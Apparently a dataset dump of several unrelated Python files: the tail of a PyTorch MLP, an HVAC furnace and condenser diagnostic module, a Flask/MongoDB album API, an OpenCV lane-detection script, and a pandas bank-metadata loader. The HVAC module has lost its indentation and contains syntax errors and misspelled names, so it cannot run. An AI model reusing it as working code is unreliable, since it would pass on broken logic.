        self.drop = nn.Dropout(0.2)
        self.relu = nn.ReLU()
        self.sigmoid = nn.Sigmoid()
        # Initialize weights (weights_init is supplied by a parent mixin)
        self.apply(self.weights_init)
    def forward(self, x: torch.Tensor) -> "tuple[torch.Tensor, None]":
        """
        Forward pass function for the global MLP.

        Args:
            x: input images with dimension Bx2x14x14 (for batch size B)

        Returns:
            Tuple of (predicted probability in ]0,1[ per sample, None);
            the second element is a placeholder — this model produces no
            auxiliary per-pair class predictions.
        """
        # flatten image input
        x = x.flatten(start_dim=1)
        # add hidden layer, with relu activation function
        x = self.relu(self.fc1(x))
        x = self.drop(x)
        x = self.relu(self.fc2(x))
        x = self.drop(x)
        x = self.relu(self.fc3(x))
        x = self.drop(x)
        x = self.fc4(x)
        x = self.sigmoid(self.classifier(x))
        return x.squeeze(), None
    def __str__(self) -> str:
        """Human-readable model name."""
        return "Multi-Layer Perceptron"
|
23,555 | 3625cdb4b7d4df54a01a8ecd2bf1f246efd8c25f | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# garvis.py
#
# Copyright 2016 David Keuchel <david.keuchel@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
import time
import compare
import Tstat
import json
class Equipment(object):
def __init__(heat_type, heat_stages, timed_stages, heatBot, heatpump, cooling_stages, cooling_tonage, cooling_cfm, coolBot):
self.heat_type = heat_type
self.heat_stages = heat_stages
self.timed_stages = timed_stages
self.heatpump = heatpump
self.heatBot = heatBot
self.cooling_stages = cooling_stages
self.cooling_tonage = cooling_tonage
self.cooling_cfm = cooling_cfm
self.coolBot
def general_heat(self, t, stage):
s = stage
if self.timed_stages:
if t < 600:
s = 'low'
else:
s = 'high'
if compare.staticPressureCheck() == 'norm':
if t >= 420:
if compare.tempRiseGas(s) == 'norm':
return True
else:
# troubleshoot mode
if self.troubleshoot_gen_furn(t):
return False
else:
return True
else:
return True
else:
# troubleshoot mode
if self.troubleshoot_gen_furn(t):
return False
else:
return True
def troubleshoot_gen_furn(t):
static = ''
delta_T = ''
s = ''
if self.timed_stages:
if Tstat.heat_read() == 'w1' or Tstat.heat_read() == 'w2':
if t < 600:
s = 'low'
else:
s = 'high'
else:
return True
else:
if Tstat.heat_read() == 'w1':
s = 'low'
elif Tstat.heat_read() == 'w2':
s = 'high'
else:
return False
static = compare.staticPressureCheck()
delta_T = compare.tempRiseGas()
if static == 'norm':
if t > 420:
if delta_T == 'norm':
return False
elif delta_T == 'low':
#error 2 - low temp rise
return True
elif delta_T == 'high':
#error 1 - filter / airflow
return True
else:
return False
else:
# error 1 - filter / airflow
return True
def troubleshoot_furnace(self, f, t):
burners = f
ind = ''
fla = ''
blo = ''
delta_T = ''
stage = ''
if self.timed_stages:
if Tstst.heat_read() == 'w2' or Tstat.heat_read() == 'w1':
if t < 600:
stage = 'low'
else:
stage = 'high'
else:
if Tstat.heat_read() == 'w1':
stage = 'low'
elif Tstat.heat_read() == 'w2':
stage = 'high'
else:
return False
if stage == True:
ind = compare.altInducerAmps(stage)
fla = compare.flameCheck()
blo = compare.altBlowerAmps('w', stage)
delta_T = compare.tempRiseGas(stage)
static = compare.staticPressureCheck()
if ind == 'norm':
if fla == 'norm':
# needs a way to tell if it lit or not
if blo == 'norm':
if delta_T == 'norm':
if static == 'norm':
return False
else:
# error 1 filter / airflow
return True
elif delta_T == 'low':
# setting error
return True
elif delta_T == 'high':
if static == 'norm':
# setting error
return True
else:
# error 1 - filter / airflow
return True
elif blo == 'low':
if delta_T == 'norm':
if static == 'norm'
# blower capacitor error
return True
else:
# error 1 airflow / filter
return True
else:
if static == 'norm':
#blower / airflow
return True
else:
#error 1 filter / airflow
return True
elif blo == 'high':
if delta_T == 'norm':
if static == 'norm':
# blower error still working
return True
else:
# blower / airflow elevated risk 1
return True
else:
if static == 'norm':
# blower error elevated risk 1
return True
else:
#blower / airflow elevated risk 2
return True
else:
# blower / board critical
return True
elif burners == True and not fla:
# flame senser error
return True
elif burners and fla == False:
# ignitor/ gas valve error
return True
else:
# ignitor/gas/flame sensor error
return True
elif ind == 'low':
if fla == 'norm':
if blo == 'norm':
if delta_T == 'norm':
if static == 'norm':
# inducer / flue error
return True
else:
# multiple errors elevated risk 1
return True
else:
if static == 'norm':
# mulitiple errors elevatied risk 1
return True
else:
# inducer / filter / airflow eleveted risk 1
return True
else:
#multiple errors elevated risk 2
return True
else:
# inducer / flue error critical
return True
elif ind == 'high':
if fla == 'norm':
if blo == 'norm':
if delta_T == 'norm':
if static == 'norm':
# inducer / flue error
return True
else:
# multiple errors elevated risk 1
return True
else:
if static == 'norm':
# mulitiple errors elevatied risk 1
return True
else:
# inducer / filter / airflow eleveted risk 1
return True
else:
#multiple errors elevated risk 2
return True
else:
# inducer / flue error critical
return True
else:
# inducer / board error critical
return True
else:
return False
def troubleshoot_condenser(self):
cond_fan = ''
compressor = ''
odt = ''
stage = ''
if Tstat.cool_read() == 'y':
stage = 'low'
elif Tstat.cool_read() == 'y2':
stage = 'high'
else:
return False
if stage == True:
odt = senscom.odt()
cond_fan = compare.cond_fan_check(stage)
compressor = compare.comp_check(stage)
if odt > 65.0:
if cond_fan == 'norm':
if compressor == 'norm':
return False
elif compressor == 'low':
#compressor issue
return True
elif compressor == 'high':
# compressor issue
else:
# power / compressor issue
return False
elif cond_fan == 'low':
#fan issue
return True
elif cond_fan == 'high':
# fan issue
return True
else:
#too cold to test properly
return True
def troubleshoot_cooling_indoor(self):
stage = ''
blower = ''
deltaT = ''
capacity = ''
static = ''
if Tstat.cool_read() == 'y':
stage = 'low'
elif Tstat.cool_read() == 'y2':
stage = 'high'
else:
return False
blower = compare.altBlowerAmps('y', stage)
deltaT = compare.tempDrop(stage)
capacity = compare.capacityCheck(self.cooling_tonage, self.cooling_cfm)
static = compare.stacicPressureCheck()
if blower == 'norm':
if deltaT == 'norm':
if capacity == 'norm':
return False
else:
if static == 'norm'
if self.coolBot:
if self.troubleshoot_condenser():
# low refrigerant
return True
else:
return False
else:
#low refrigerant / condenser issue
return True
else:
#error 1 airflow
return True
else:
if static == 'norm':
if self.coolBot:
if self.troubleshoot_condenser():
# error 1 airflow issues / clogged filter
return True
else:
pass
else:
# condenser issue
return True
else:
#airflow issue
return True
else:
# blower issue
return True
def troubleshoot_hp_indoor(self):
stage = ''
blower = ''
deltaT = ''
static = ''
if Tstat.cool_read() == 'y' and Tstat.reversing() and not Tstat.heat_read():
stage = 'low'
elif Tstat.cool_read() == 'y2' and Tstat.reversing() and not Tstat.heat_read():
stage = 'high'
elif Tstat.cool_read() and Tstat.reversing() and Tstat.heat_read():
stage = 'aux'
else:
return False
blower = compare.altBlowerAmps('y', stage)
deltaT = compare.tempRiseHp(stage)
static = compare.stacicPressureCheck()
if blower == 'norm':
if deltaT == 'norm':
return False
else:
if static == 'norm'
if self.coolBot:
if self.troubleshoot_condenser():
# low refrigerant/ defrost/ condenser issue
return True
else:
pass
else:
#low refrigerant / condenser issue
return True
else:
#airflow
return True
elif blower == 'low':
if delta_T == 'norm':
if static == 'norm':
# capacitor issue
return True
else:
# error 1 airflow / filter
return True
elif delta_T == 'high':
#error 1 airflow / filter
return True
else:
if static == 'norm':
if self.coolbot:
if self.troubleshoot_condenser():
return True
else:
# capacitor issue
return True
else:
# capacitor
return True
else:
# error 1 airflow
return True
elif blower == 'high':
if delta_T == 'norm':
if static == 'norm':
# bad blower motor still running
return True
else:
# bad motor + airflow
return True
else:
# blower / airflow
return True
else:
# blower / board
return True
def troubleshoot_geo(self):
stage = ''
blower = ''
deltaT = ''
capacity = ''
static = ''
comp = ''
pumps = ''
if Tstat.cool_read() == 'y'and not Tstat.reversing and not Tstat.heat_read():
stage = 'low'
elif Tstat.cool_read() == 'y2' and not Tstat.reversing and not Tstat.heat_read():
stage = 'high'
if Tstat.cool_read() == 'y'and Tstat.reversing and not Tstat.heat_read():
stage = 'low'
elif Tstat.cool_read() == 'y2' and Tstat.reversing and not Tstat.heat_read():
stage = 'high'
elif Tstat.cool_read() and Tstat.reversing and Tstat.heat_read():
stage = 'aux'
else:
return False
if Tstat.reversing():
deltaT = compare.tempRiseHp(stage)
else:
deltaT = compare.tempDrop(stage)
blower = compare.altBlowerAmps(stage)
capacity = compare.capacityCheck(self.cooling_tonage, self.cooling_cfm)
static = compare.staticPressureCheck()
comp = compare.comp_check(stage)
pumps = compare.pump_check()
if stage:
if pumps == 'norm':
if comp == 'norm':
if blower == 'norm':
if static == 'norm':
if deltaT == 'norm':
if not Tstat.reversing():
if capacity == 'norm':
return False
else:
# low water/ refrigerant
return True
else:
return False
else:
# low water/ refrigerant
return True
# clogged filter/ airflow restiction
return True
else:
# bad blower
return True
else:
# bad compressor
return True
else:
# bad pumps
return True
class GasFurnace(Equipment):
    """Gas furnace controller built on the Equipment diagnostics.

    Drives a heat call (furnaceCall) through the startup, staged, and
    timed-stage monitoring loops, each of which re-runs the compare.*
    sensor checks once per second while the thermostat keeps calling.

    NOTE(review): several call sites look inconsistent with their callees
    and need confirming against the rest of the project:
    - super().__init__ passes ``self`` explicitly as the first argument
      (so Equipment receives it twice) and omits the cooling parameters
      Equipment's signature lists.
    - ``Equipment.troubleshoot_furnace(True)`` is called unbound — no
      instance for ``self`` — and without the ``t`` argument it requires.
    - ``self.furnace_start()`` is called without the ``stage`` argument
      its signature requires, and ``furnace_stage`` receives the ints
      1/2 while the compare helpers are elsewhere given 'low'/'high'.
    """
    def __init__(self, heat_stages, timed_stages, heatBot):
        super(GasFurnace, self).__init__(self, 'furnace', heat_stages, timed_stages, heatBot)
        self.heat_stages = heat_stages
        self.timed_stages = timed_stages
        self.heatBot = heatBot
    def furnaceCall(self, stage):
        # Run a heat call: start the furnace, then keep monitoring once per
        # second for as long as the thermostat calls (w1/w2).
        if self.heat_stages == '1':
            # Single-stage furnace.
            self.furnace_start()
            time.sleep(3)
            while Tstat.heat_read() == 'w1' or Tstat.heat_read() == 'w2':
                self.furnace_stage(2)
                time.sleep(1)
        elif self.heat_stages == '2' and self.timed_stages == 0:
            # Two-stage furnace staged by the thermostat wire (w1 vs w2).
            self.furnace_start()
            time.sleep(3)
            while Tstat.heat_read() == 'w1' or Tstat.heat_read() == 'w2':
                if Tstat.heat_read() == 'w2':
                    s = 2
                else:
                    s = 1
                self.furnace_stage(s)
                time.sleep(1)
        elif self.heat_stages == '2' and not self.timed_stages == 0:
            # Two-stage furnace staged by elapsed time; t starts at 98 s
            # because furnace_start already consumed the ignition window.
            self.furnace_start()
            time.sleep(3)
            t = 98
            while Tstat.heat_read() == 'w1' or Tstat.heat_read() == 'w2':
                self.furnace_timed(t)
                time.sleep(1)
                t = t + 1
    def furnace_stage(self, stage):
        # One monitoring pass for a wire-staged furnace: inducer amps,
        # flame, blower amps, then temperature rise; any abnormal reading
        # drops into troubleshoot mode.  True = keep running.
        if compare.altInducerAmps(stage) == 'norm':
            if compare.flameCheck():
                if compare.altBlowerAmps('w', stage) == 'norm':
                    if compare.tempRiseGas(stage) == 'norm':
                        return True
                    else:
                        # troubleshoot mode
                        if Equipment.troubleshoot_furnace(True):
                            return False
                        else:
                            return True
                else:
                    #troubleshoot mode
                    if Equipment.troubleshoot_furnace(True):
                        return False
                    else:
                        return True
            else:
                #troubleshoot mode
                if Equipment.troubleshoot_furnace(True):
                    return False
                else:
                    return True
        else:
            #troubleshoot mode
            if Equipment.troubleshoot_furnace(True):
                return False
            else:
                return True
    def furnace_timed(self, t):
        # One monitoring pass for a time-staged furnace: the stage follows
        # elapsed time (low fire before 600 s), then the same sensor
        # cascade as furnace_stage.
        if t < 600:
            stage = 'low'
        else:
            stage = 'high'
        if compare.altInducerAmps(stage) == 'norm':
            if compare.flameCheck():
                if compare.altBlowerAmps('w', stage) == 'norm':
                    if compare.tempRiseGas(stage) == 'norm':
                        return True
                    else:
                        # troubleshoot mode
                        # NOTE(review): unlike furnace_stage, this branch has
                        # no `else: return True` and can fall through to None.
                        if Equipment.troubleshoot_furnace(True, t):
                            return False
                else:
                    #troubleshoot mode
                    if Equipment.troubleshoot_furnace(True, t):
                        return False
                    else:
                        return True
            else:
                #troubleshoot mode
                if Equipment.troubleshoot_furnace(True, t):
                    return False
                else:
                    return True
        else:
            #troubleshoot mode
            if Equipment.troubleshoot_furnace(True, t):
                return False
            else:
                return True
    def furnace_start(self, stage):
        # Ignition sequence: check the inducer at high, wait out the 30 s
        # pre-purge, confirm flame twice (ignition then proving), wait for
        # the blower-on delay, then verify blower amps.  True = started ok.
        t = 0
        if compare.altInducerAmps('high') == 'norm':
            while t < 30:
                t = t + 1
                time.sleep(1)
            if compare.flameCheck():
                while t < 33:
                    t = t + 1
                    time.sleep(1)
                if compare.flameCheck():
                    while t < 95:
                        t = t + 1
                        time.sleep(1)
                    if compare.altBlowerAmps('w', stage) == 'norm':
                        return True
                    else:
                        # troubleshoot mode
                        if Equipment.troubleshoot_furnace(True):
                            return False
                        else:
                            return True
                else:
                    # troubleshoot
                    if Equipment.troubleshoot_furnace(True):
                        return False
                    else:
                        return True
            else:
                # troubleshoot
                if Equipment.troubleshoot_furnace(False):
                    return False
                else:
                    return True
        else:
            #troubleshoot
            if Equipment.troubleshoot_furnace(False):
                return False
            else:
                return True
class Condenser(Equipment):
    """Condenser (outdoor unit) equipment model.

    Verifies cooling, heat-pump heating and geothermal cooling cycles
    against the `compare` baselines; `p` counts polls so temperature-split
    and capacity checks only run once the system has stabilized (p > 4).

    NOTE(review): the code calls both compare.compresser() (cooling / hp)
    and compare.compressor() (geo_cool) — confirm which spelling the
    compare module defines; one is probably a typo. Left unchanged here.
    """

    def __init__(self, heatpump, cooling_stages, cooling_tonage, cooling_cfm, coolBot):
        super(Condenser, self).__init__('none', 'none', 'none', 'none', heatpump, cooling_stages, cooling_tonage, cooling_cfm, coolBot)
        self.heatpump = heatpump
        self.cooling_stages = cooling_stages
        self.cooling_tonage = cooling_tonage
        self.cooling_cfm = cooling_cfm
        self.coolBot = coolBot

    def cooling(self, p, stage):
        """Check one cooling cycle. True while healthy, False to stop.

        With a coolBot the condenser fan and compressor are verified first;
        otherwise only blower amps / temperature drop / capacity are checked.
        """
        t = 0
        if self.coolBot == True:
            time.sleep(1)
            t = t + 1
            if compare.condenserFan(stage) == 'norm':
                time.sleep(1)
                t = t + 1
                if compare.compresser(stage) == 'norm':
                    if compare.altBlowerAmps('y', stage) == 'norm':
                        if p > 4:
                            if compare.tempDrop(stage) == 'norm':
                                if compare.capacityCheck(self.cooling_tonage, self.cooling_cfm) == 'norm':
                                    return True
                                else:
                                    if Equipment.troubleshoot_cooling_indoor() == True:
                                        return False
                                    else:
                                        return True
                            else:
                                if Equipment.troubleshoot_cooling_indoor() == True:
                                    return False
                                else:
                                    return True
                        else:
                            # Not stabilized yet: skip split/capacity checks.
                            return True
                    else:
                        if Equipment.troubleshoot_cooling_indoor() == True:
                            return False
                        else:
                            return True
                else:
                    if Equipment.troubleshoot_cooling_indoor() == True:
                        return False
                    else:
                        return True
            else:
                if Equipment.troubleshoot_cooling_indoor() == True:
                    return False
                else:
                    return True
        else:
            if compare.altBlowerAmps('y', stage) == 'norm':
                if p > 4:
                    if compare.tempDrop(stage) == 'norm':
                        if compare.capacityCheck(self.cooling_tonage, self.cooling_cfm) == 'norm':
                            return True
                        else:
                            if Equipment.troubleshoot_cooling_indoor():
                                return False
                            else:
                                return True
                    else:
                        if Equipment.troubleshoot_cooling_indoor():
                            return False
                        else:
                            return True
                else:
                    # Not stabilized yet: skip split/capacity checks.
                    return True
            else:
                if Equipment.troubleshoot_cooling_indoor():
                    return False
                else:
                    return True

    def hp(self, p, stage):
        """Check one heat-pump heating cycle (temperature rise instead of
        drop; no capacity check). True while healthy, False to stop."""
        t = 0
        if self.coolBot == True:
            time.sleep(1)
            t = t + 1
            if compare.condenserFan(stage) == 'norm':
                time.sleep(1)
                t = t + 1
                if compare.compresser(stage) == 'norm':
                    if compare.altBlowerAmps('y', stage) == 'norm':
                        if p > 4:
                            if compare.tempRiseHp(stage) == 'norm':
                                return True
                            else:
                                if Equipment.troubleshoot_hp_indoor():
                                    return False
                                else:
                                    return True
                        else:
                            return True
                    else:
                        if Equipment.troubleshoot_hp_indoor():
                            return False
                        else:
                            return True
                else:
                    if Equipment.troubleshoot_hp_indoor():
                        return False
                    else:
                        return True
            else:
                if Equipment.troubleshoot_hp_indoor():
                    return False
                else:
                    return True
        else:
            if compare.altBlowerAmps('y', stage) == 'norm':
                if p > 4:
                    if compare.tempRiseHp(stage) == 'norm':
                        return True
                    else:
                        if Equipment.troubleshoot_hp_indoor():
                            return False
                        else:
                            return True
                else:
                    return True
            else:
                if Equipment.troubleshoot_hp_indoor():
                    return False
                else:
                    return True

    def geo_cool(self, p, stage):
        """Check one geothermal cooling cycle (no condenser fan).

        The while loop runs exactly once (t goes 0 -> 1); it only provides
        the one-second settle delay before the checks.
        """
        t = 0
        while t == 0:
            time.sleep(1)
            t = t + 1
            if compare.compressor(stage) == 'norm':
                if compare.altBlowerAmps('y', stage) == 'norm':
                    if p > 4:
                        if compare.tempDrop(stage) == 'norm':
                            if compare.capacityCheck(self.cooling_tonage, self.cooling_cfm) == 'norm':
                                return True
                            else:
                                # BUG FIX: the original called the undefined
                                # lowercase name `equipment.troubleshoot_geo()`
                                # (NameError); the rest of this file uses the
                                # Equipment class.
                                if Equipment.troubleshoot_geo():
                                    return False
                                else:
                                    return True
                        else:
                            if Equipment.troubleshoot_geo():
                                return False
                            else:
                                return True
                    else:
                        return True
                else:
                    if Equipment.troubleshoot_geo():
                        return False
                    else:
                        return True
            else:
                if Equipment.troubleshoot_geo():
                    return False
                else:
                    return True
def main():
    """Program entry point; currently a no-op that reports success."""
    return 0

if __name__ == '__main__':
    main()
|
23,556 | 98ce0ef390934403b1f3a69111fa114779cdbd28 | import os
from flask import (
Flask,
render_template,
jsonify,
request,
redirect)
from bson import Binary, Code
from bson.json_util import dumps
import pymongo
# Flask app and a MongoDB client, both created at import time.
app = Flask(__name__)
conn = 'mongodb://localhost:27017'
client = pymongo.MongoClient(conn)
# All routes read from the HipHop100 database on the local Mongo server.
db = client.HipHop100
@app.route('/')
def index():
    """Render the home page template."""
    return render_template("index.html")
@app.route('/credits')
def credits():
    """Render the credits page template."""
    return render_template("credits.html")
@app.route('/api/albumData')
def albumData():
    """Return every document in the `albums` collection as a JSON string.

    Uses bson.json_util.dumps (rather than jsonify) so Mongo-specific types
    such as ObjectId serialize cleanly.
    """
    albums = list(db.albums.find())
    return dumps(albums)
# Run the development server when executed directly.
if __name__ == "__main__":
    app.run(debug=True)
|
23,557 | 84ece31945d88fe5a88f5b910610e4ecedb2ae24 | import matplotlib.image as mpimg
import numpy as np
import cv2
import math
import os
from moviepy.editor import VideoFileClip
def grayscale(img):
    """Convert an RGB image to a single-channel grayscale image.

    NOTE: display the result with plt.imshow(gray, cmap='gray').
    Use cv2.COLOR_BGR2GRAY instead if the image came from cv2.imread().
    """
    gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
    return gray
def canny(img, low_threshold, high_threshold):
    """Run the Canny edge detector on `img` with the given hysteresis thresholds."""
    edges = cv2.Canny(img, low_threshold, high_threshold)
    return edges
def gaussian_blur(img, kernel_size):
    """Smooth `img` with a square Gaussian kernel of side `kernel_size`."""
    blurred = cv2.GaussianBlur(img, (kernel_size, kernel_size), 0)
    return blurred
def region_of_interest(img, vertices):
    """Black out everything outside the polygon formed from `vertices`.

    Works for both grayscale and multi-channel images: the fill color's
    channel count matches `img`.
    """
    mask = np.zeros_like(img)
    if len(img.shape) > 2:
        fill_color = (255,) * img.shape[2]
    else:
        fill_color = 255
    cv2.fillPoly(mask, vertices, fill_color)
    return cv2.bitwise_and(img, mask)
def draw_lines(img, lines, color=[255, 0, 0], thickness=6):
    """Average the Hough segments into one left and one right lane line and
    draw them on `img` (mutated in place).

    Segments are split by slope sign; |slope| must exceed `slope_eps` to
    reject near-horizontal noise. Each side's slope and center are averaged
    and the line is extrapolated from 60% of the image height to the bottom.
    """
    slope_eps = 0.35
    left_slope, left_center = [], []
    right_slope, right_center = [], []
    for line in lines:
        for x1, y1, x2, y2 in line:
            # BUG FIX: vertical segments (x2 == x1) previously raised
            # ZeroDivisionError in the slope computation; skip them.
            if x2 == x1:
                continue
            slope = (y2 - y1) / (x2 - x1)
            center = (x1 + x2) / 2, (y1 + y2) / 2
            if slope < -slope_eps:
                left_slope.append(slope)
                left_center.append(center)
            elif slope > slope_eps:
                right_slope.append(slope)
                right_center.append(center)
    start_y = img.shape[0] * 0.6
    end_y = img.shape[0]
    # BUG FIX: the original tested `len(left_slope > 0)` — the length of a
    # boolean array, which only behaved correctly by accident — and built
    # length-weighted means that were immediately overwritten by the
    # unweighted np.mean results; that dead code is removed.
    for slopes, centers in ((left_slope, left_center), (right_slope, right_center)):
        if not slopes:
            continue
        slope_mean = np.mean(slopes)
        center_mean = np.mean([c[0] for c in centers]), np.mean([c[1] for c in centers])
        # Solve x = (y - y0) / m + x0 at the two extrapolation heights.
        start = int((start_y - center_mean[1]) / slope_mean + center_mean[0]), int(start_y)
        end = int((end_y - center_mean[1]) / slope_mean + center_mean[0]), int(end_y)
        cv2.line(img, start, end, color, thickness)
def hough_lines(img, rho, theta, threshold, min_line_len, max_line_gap):
    """Run a probabilistic Hough transform on a Canny edge image.

    Returns a black color image of the same height/width with the averaged
    lane lines drawn on it.
    """
    segments = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]),
                               minLineLength=min_line_len, maxLineGap=max_line_gap)
    canvas = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)
    draw_lines(canvas, segments)
    return canvas
# Python 3 has support for cool math symbols.
def weighted_img(img, initial_img, α=0.8, β=1., λ=0.):
    """Blend the annotated line image into the original frame.

    Computes initial_img * α + img * β + λ; both images must share a shape.
    """
    blended = cv2.addWeighted(initial_img, α, img, β, λ)
    return blended
def Lane_finding(img, kernel_size=5, low_threshold=50, high_threshold=150, rho=2,
                 theta=np.pi / 180, threshold=15, min_line_len=60, max_line_gap=30):
    """Full detection pipeline: grayscale -> blur -> Canny -> trapezoidal ROI
    mask -> Hough transform. Returns a black image with the lane lines drawn.
    """
    height, width = img.shape[0], img.shape[1]
    edges = canny(gaussian_blur(grayscale(img), kernel_size),
                  low_threshold, high_threshold)
    # Trapezoid from the bottom corners up to a narrow band at 60% height.
    roi_vertices = np.array([[(0, height), (width / 2.0 - 20, height * 0.6),
                              (width / 2.0 + 20, height * 0.6), (width, height)]],
                            dtype=np.int32)
    masked = region_of_interest(edges, roi_vertices)
    return hough_lines(masked, rho, theta, threshold, min_line_len, max_line_gap)
# Batch-process the still test images through the pipeline at import time.
input_path = '/home/charleschan/PycharmProjects/basic-lane-lines-detection-project/test_images'
output_path = '/home/charleschan/PycharmProjects/basic-lane-lines-detection-project/processed/'
test_images = os.listdir(input_path)
for i in test_images:
    path = input_path + '/' + i
    image = mpimg.imread(path)
    processed_image = Lane_finding(image)
    # NOTE(review): output_path already ends with '/', so this produces a
    # double slash — harmless on POSIX, but worth tidying.
    path = output_path + '/' + i
    mpimg.imsave(path, processed_image, format='jpg')
def process_image(image):
    """Video-frame callback: overlay the detected lane lines on `image`.

    Returns a 3-channel color frame, as fl_image below requires.
    """
    annotated = Lane_finding(image)
    return weighted_img(annotated, image)
# Annotate the sample video frame-by-frame and write it back out.
white_output = '/home/charleschan/PycharmProjects/basic-lane-lines-detection-project/test_video_out/solidWhiteRight.mp4'
# To speed up the testing process you may want to try your pipeline on a shorter subclip of the video
# To do so add .subclip(start_second,end_second) to the end of the line below
# Where start_second and end_second are integer values representing the start and end of the subclip
# You may also uncomment the following line for a subclip of the first 5 seconds
#clip1 = VideoFileClip("test_videos/solidWhiteRight.mp4").subclip(0,5)
clip1 = VideoFileClip("/home/charleschan/PycharmProjects/basic-lane-lines-detection-project/test_video/solidWhiteRight.mp4")
white_clip = clip1.fl_image(process_image) # NOTE: this function expects color images!!
white_clip.write_videofile(white_output, audio=False)
|
23,558 | 2079c4bc179d513a057b1cbecd93b8cea6bfaf8a | from uuid import uuid4
from database.connector import connect
import datetime as dt
import json
import pandas as pd
from sql import sql_service
def prepare_bank_meta_data(banks, country_code):
    """Serialize per-bank metadata rows into JSON payloads for insertion.

    `banks` must provide name, bank_code, bank_id and company_id columns;
    `country_code` is the destination country's three-char ISO code.
    Returns a list of dicts with 'data' (JSON string), 'bank_id',
    'company_id' keys.
    """
    def sanitize(value):
        # Defensive round-trip that strips any unencodable characters.
        return str(value).encode('utf-8', 'ignore').decode('utf-8', 'ignore')

    records = []
    for _, row in banks.iterrows():
        payload = {'BankName': sanitize(row['name']),
                   'BankCode': sanitize(row['bank_code']),
                   'PayeeCode': 'TRG', 'SubPayeeAgencyName': 'Agency Name', 'pocID': '',
                   'DestinationCountryISOCode': sanitize(country_code)}
        records.append({'data': json.dumps(payload),
                        'bank_id': row['bank_id'],
                        'company_id': row['company_id']})
    return records
def prepare_bank_branch(branch_info):
    """Build the bank_branch insert frame.

    Keeps name and bank_id from `branch_info`, adds a constant payment type
    of 'D', and replaces missing values with 'Not Available'.
    """
    frame = pd.DataFrame()
    frame['name'] = branch_info['name']
    frame['bank_id'] = branch_info['bank_id']
    frame['payment_type_code'] = 'D'
    return frame.fillna('Not Available')
def prepare_branch_metadata(branch_info):
    """Serialize per-branch metadata rows into JSON payloads for insertion.

    Optional columns (branch_code, address, city, state, district,
    routing_no) are included only when present in `branch_info`; missing
    values become 'Not Available' and company_id is hard-coded to 7.
    """
    available = branch_info.columns.tolist()
    branch_info = branch_info.fillna('Not Available')

    def clean(value):
        # Strip any unencodable characters.
        return value.encode('utf-8', 'ignore').decode('utf-8', 'ignore')

    records = []
    for _, row in branch_info.iterrows():
        payload = {'BranchName': row['name']}
        if 'branch_code' in available:
            payload['BranchCode'] = clean(str(row['branch_code']))
        if 'address' in available:
            payload['Address'] = clean(row['address'])
        if 'city' in available:
            payload['City'] = clean(row['city'])
        if 'state' in available:
            payload['State'] = clean(row['state'])
        if 'district' in available:
            payload['District'] = clean(row['district'])
        if 'routing_no' in available:
            payload['RoutingNumber'] = clean(str(row['routing_no']))
        records.append({'data': json.dumps(payload),
                        'branch_id': row['branch_id'],
                        'company_id': 7})
    print("MetaDatalist=", len(records))
    return records
def insert_bank_metadata(bank_data, country_code, cur):
    """Insert JSON metadata rows for banks that do not already have them.

    Joins `bank_data` against the existing `bank` table to resolve bank ids,
    removes rows already present in bank_metadata, and bulk-inserts the rest
    using cursor `cur`.
    """
    banks = sql_service.fetch_data('bank', ['id', 'name', 'country_id'], cur)
    banks.columns = ['bank_id', 'name', 'country_id']
    existing_data = sql_service.fetch_data('bank_metadata', ['data', 'bank_id', 'company_id'], cur)
    bank_data['name'] = pd.Series(bank_data['name']).str.title()
    # BUG FIX: drop_duplicates() is not in-place; the original discarded the
    # result, so duplicate bank names were never actually removed.
    bank_data = bank_data.drop_duplicates(subset=['name']).reset_index(drop=True)
    print('existing banks=', len(banks))
    print("bankData=", len(bank_data))
    print('existingBankMetadata=', len(existing_data))
    insert_data = pd.DataFrame(prepare_bank_meta_data(pd.merge(bank_data, banks), country_code))
    print('insertData=', len(insert_data))
    data_to_insert = sql_service.remove_duplicate_data(existing_data, insert_data)
    print('dataToInsert=', len(data_to_insert))
    sql_service.bulk_insert('bank_metadata', data_to_insert.columns.tolist(), data_to_insert.values.tolist(), cur)
    return
def enable_mto_bank(country_id, company_id):
    """Enable every bank of `country_id` for MTO `company_id` by inserting
    one mto_bank row per bank, each with a fresh UUID primary key."""
    print("Enabling bank with country id: %s and for mto: %s" % (country_id, company_id))
    # NOTE(review): unlike the sibling helpers, these sql_service calls pass
    # no cursor — confirm fetch_data/bulk_insert open their own connection
    # when `cur` is omitted.
    banks = sql_service.fetch_data('bank', ['id', 'country_id'])
    data_to_insert = banks[banks['country_id'] == country_id][['id']]
    data_to_insert.columns = ['bank_id']
    # One fresh UUID per row (map over the index to vectorize the call).
    data_to_insert['id'] = data_to_insert.index.to_series().map(lambda x: str(uuid4()))
    data_to_insert['created_at'] = dt.datetime.now()
    data_to_insert['company_id'] = company_id
    # Reorder columns to match the mto_bank table definition.
    data_to_insert = data_to_insert[['id', 'created_at', 'bank_id', 'company_id']]
    print('dataToInsert=', data_to_insert[:5])
    sql_service.bulk_insert('mto_bank', data_to_insert.columns.tolist(), data_to_insert.values.tolist())
    print("--------------------Insertion Complete--------------------")
def insert_banks(sheets):
    """Insert banks (and their metadata) for every country sheet.

    `sheets` maps a three-char country code to rows with at least a 'name'
    column. Unknown country codes are skipped with a message.
    """
    conn = connect()
    cur = conn.cursor()
    countries = sql_service.fetch_data('country', ['id', 'name', 'three_char_code'], cur)
    for countryCode in sheets.keys():
        try:
            country = sql_service.fetch_country_by_code(countries, countryCode)
        except IndexError as e:
            print("--------------------Country not found--------------------")
            print("--------------------Aborting insert for %s--------------------" % countryCode)
            continue
        print(
            "Inserting banks for %s.........................................................." % country['name'].values[
                0])
        banks = pd.DataFrame(sheets[countryCode])
        banks['country_id'] = country['id'].values[0]
        banks['name'] = pd.Series(banks['name']).str.title()
        # BUG FIX: drop_duplicates() returns a copy; the original discarded
        # it, so duplicate names were inserted anyway.
        banks = banks.drop_duplicates(subset=['name']).reset_index(drop=True)
